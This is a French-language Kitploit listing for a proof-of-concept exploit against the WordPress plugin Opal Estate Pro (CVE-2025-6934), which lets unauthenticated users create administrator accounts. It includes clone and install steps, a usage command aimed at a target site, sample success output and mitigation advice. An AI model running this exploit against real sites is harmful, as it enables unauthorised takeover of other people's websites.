Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-6934 — CVE-2025-6934 est une vulnérabilité critique dans le plugin WordPress Opal Estate Pro (<= 1.7.5) qui permet à des attaquants non authentifiés de créer de nouveaux comptes administrateur via le processus d'enregistrement AJAX non sécurisé du plugin. | Kitploit
Outils/GitHubGitHub/0xgh057r3c0n/cve-2025-6934
Analyse des VulnérabilitésExploitationExploitation d'Applications WebCTFTests d'IntrusionApprentissage et Éducation
GitHub0xgh057r3c0n/cve-2025-6934

CVE-2025-6934

CVE-2025-6934 est une vulnérabilité critique dans le plugin WordPress Opal Estate Pro (<= 1.7.5) qui permet à des attaquants non authentifiés de créer de nouveaux comptes administrateur via le processus d'enregistrement AJAX non sécurisé du plugin.

Voir le dépôt
52il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-6934 – Exploit WordPress Opal Estate Pro

WordPress Logo

📖 Description Ce dépôt contient un exploit de preuve de concept (PoC) pour CVE-2025-6934, une vulnérabilité critique dans le plugin WordPress : Opal Estate Pro <= 1.7.5, permettant la création non authentifiée de comptes administrateur.

⚠️ Avertissement : Cet outil est fourni uniquement à des fins éducatives et de recherche en sécurité.
L'auteur n'est pas responsable de toute utilisation abusive ou des dommages causés.


🚀 Fonctionnalités

  • Détection automatique de la version du plugin depuis readme.txt
  • Extraction du nonce pour l'enregistrement
  • Exploite un point de terminaison AJAX vulnérable
  • Crée un nouveau compte administrateur

🔧 Installation

Clonez le dépôt et installez les dépendances :

root@kitploit:~
git clone https://github.com/0xgh057r3c0n/CVE-2025-6934.git
cd CVE-2025-6934

pip3 install -r requirements.txt

requirements.txt

root@kitploit:~
requests
beautifulsoup4
colorama

▶️ Utilisation

Exécutez le script avec votre cible :

root@kitploit:~
python3 CVE-2025-6934.py -u http://target.com/ -mail [email protected] -password MySecurePass123 -user newadmin

✅ Exemple de sortie :

root@kitploit:~
[✔] Exploit Successful!
    Username : newadmin
    Email    : [email protected]
    Password : MySecurePass123
    Role     : administrator

📸 Capture d'écran

Exploit Screenshot


🛡️ Atténuation

  • Mettez à jour vers la dernière version du plugin
  • Ou désactivez immédiatement le plugin vulnérable
  • Surveillez les journaux WordPress pour détecter toute création non autorisée de comptes

👤 Auteur

Gaurav Bhattacharjee (0xgh057r3c0n)


📜 Licence

Ce projet est sous licence MIT – voir le fichier LICENSE pour plus de détails.

Télécharger l’outil